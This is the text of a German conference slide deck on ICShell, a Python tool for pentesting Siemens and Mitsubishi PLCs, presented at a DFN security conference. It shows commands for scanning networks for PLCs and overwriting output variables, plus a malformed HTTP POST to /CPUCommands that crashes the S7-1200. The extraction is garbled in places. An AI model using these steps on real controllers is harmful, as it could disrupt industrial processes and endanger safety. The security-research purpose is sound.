ICShell. ICShell 22. DFN-Konferenz Sicherheit in vernetzten Systemen

Größe: px

Ab Seite anzeigen:

Download "ICShell. ICShell 22. DFN-Konferenz Sicherheit in vernetzten Systemen"

Hede Heidrich
vor 6 Jahren
Abrufe

1 SCADA SCADA Pentesting Pentesting made made simple simple

2 SCADA Pentesting made simple Inhalt PLC/SPS Grundlagen Kurze Einführung in das Tool

3 Moderne Industrie Automatisiert & vernetzt Fertigungsroboter, Smart-Grid, usw. Industrie 4.0 Einsatz von Informationstechnik Programmable Logic Controller (PLC/SPS)

7 IEC Zahlreiche Hersteller Siemens, Mitsubishi, General Electrics, Schneider etc. Standardisierung notwendig eignet sich für PLCs nach IEC 61131

8 PLCs nach IEC PLC: programmierbarer Computer Anpassung an industrielle Umgebungen Elektromagnetische Verträglichkeit Bauform (Hutschiene) etc Abgrenzung zum Standard-Computer: Zyklische Programmausführung Prozessabbild

9 PLCs nach IEC Eingangswerte lesen Prozessabbild Benutzerprogramm ausführen Ausgangswerte schreiben

PLCs nach IEC 61131 Eingangswerte lesen Prozessabbild

10 PLCs nach IEC Eingangswerte lesen Prozessabbild Benutzerprogramm ausführen Ausgangswerte schreiben IP-Kommunikation

11 PLCs nach IEC Kommunikation Request-Response Authentifizierung nicht vorgesehen Einheitliche API

12 PLCs nach IEC Programmiersprachen IF 'INPUT1' AND 'INPUT2' THEN 'OUTPUT':= 1; ELSE 'OUTPUT':= 0; END_IF;

13 PLCs nach IEC Programmiersprachen

14 PLCs nach IEC Zusammenfassung Einheitliches Ablaufmodell Einheitliches Kommunikationsmodell Einheitliches Programmiermodell Einheitliches Tool für Sicherheitsanalysen

15 Einheitliche Kommunikation Standardisierung aus Endanwender-Sicht API Request-Response-Konzept read_var(a) send_var(a)

16 Proprietäre Binärprotokolle Implementieren IEC Proprietäre Erweiterungen Programm-Upload Debugging read_var(a)? send_var(a)

17 implementiert proprietäre Protokolle Schwachstellen in Protokollen & Implementierungen aufzeigen Einheitliche Sicherheitsbetrachtung der Geräteklasse ermöglichen read_var(a)! send_var(a)

18 Was ist nicht? Kein Ersatz für Engineering-Tools der Hersteller

19 Python, Modular aufgebaut Unterstützte Protokolle: Siemens, Mitsubishi Features: PLC identifizieren Prozessvariablen modifizieren Proxy/MitM Exploit

20 Welcome to :)

21 Welcome to :) print (5+5) 10

22 Welcome to :) print (5+5) 10 result = ics_scan(" /24")

23 Welcome to :) print (5+5) 10 result = ics_scan(" /24") Found 2 PLC: + + Type Vendor IP ConnectionType + + S71200 Siemens S7 Comm + + FX3GE Mitsubishi Melsec + +

24 clear() s7plc = result[0] ics_connect(s7plc) Ok.

25 clear() s7plc = result[0] ics_connect(s7plc) Ok. var = VarBool() var.address = 0x var.area = Var.AREA_OUTPUT

26 clear() s7plc = result[0] ics_connect(s7plc) Ok. var = VarBool() var.address = 0x var.area = Var.AREA_OUTPUT

27 clear() ics_getvar(s7plc, var) Ok.

28 clear() ics_getvar(s7plc, var) Ok. var.show() Typ: Bool Area: Output Address: 0x Value: False

29 clear() ics_getvar(s7plc, var) Ok. var.show() Typ: Bool Area: Output Address: 0x Value: False var.value = True

30 clear() ics_getvar(s7plc, var) Ok. var.show() Typ: Bool Area: Output Address: 0x Value: False var.value = True ics_setvar(s7plc, var)

31 clear() ics_getvar(s7plc, var) Ok. var.show() Typ: Bool Area: Output Address: 0x Value: False var.value = True ics_setvar(s7plc, var) Ok.

32 clear() ics_getvar(s7plc, var) Ok. var.show() Typ: Bool Area: Output Address: 0x Value: False var.value = True ics_setvar(s7plc, var) Ok. K A e n i e e i z i f i t n e h t u r o v g n ru n e d n a h

33 clear() ics_proxy(s7plc, Display_Var)

34 clear() ics_proxy(s7plc, Display_Var) INFO: Incoming connection from (' ', 49253) INFO: S7Comm: New Client Connected. INFO: new pdu > forward to plc + + Address Area Type Value Raw + + 0x input Boolean true 01 0x input Boolean false 00 0x input Integer

clear() plc = S71200() plc.host = '192.168.155.

35 clear() plc = S71200() plc.host = ' ' ics_exploit(plc, S71200_HTTPS_POST_DEFECT_MODE) Ok.

36 Siemens Security Advisory CVE SSA pdf vom Firmware 4.0

37 POST /CPUCommands HTTP/1.1 Host: Content Length: 26 PriNav=Start&Run=Go+to+RUN

38 POST /CPUCommands HTTP/1.1 Host: Content Length: 1 PriNav=Start&Run=Go+to+RUN

39 POST /CPUCommands HTTP/1.1 Host: Content Length: 1 PriNav=Start&Run=Go+to+RUN

d e r i u q e POST /CPUCommands HTTP/1.1 R Host: 192.168.155.

40 d e r i u q e POST /CPUCommands HTTP/1.1 R Host: t r a Content Length: 1 t s e PriNav=Start&Run=Go+to+RUN R d l o C e t e l p m o C

41 Ausblick Veröffentlichung: Erweiterungen: Mehr Protokolle Weitere Funktionen Offen für Ihrer Vorschläge/Ihren Code

Ähnliche Dokumente

Typische IT-Sicherheitsprobleme. IT-Sicherheitsprobleme in

Typische Typische IT-Sicherheitsprobleme IT-Sicherheitsprobleme in in Industriesteuerungen Industriesteuerungen am am Beispiel Beispiel der der Siemens Siemens SIMATIC SIMATIC S7-1200 S7-1200 Inhalt ICS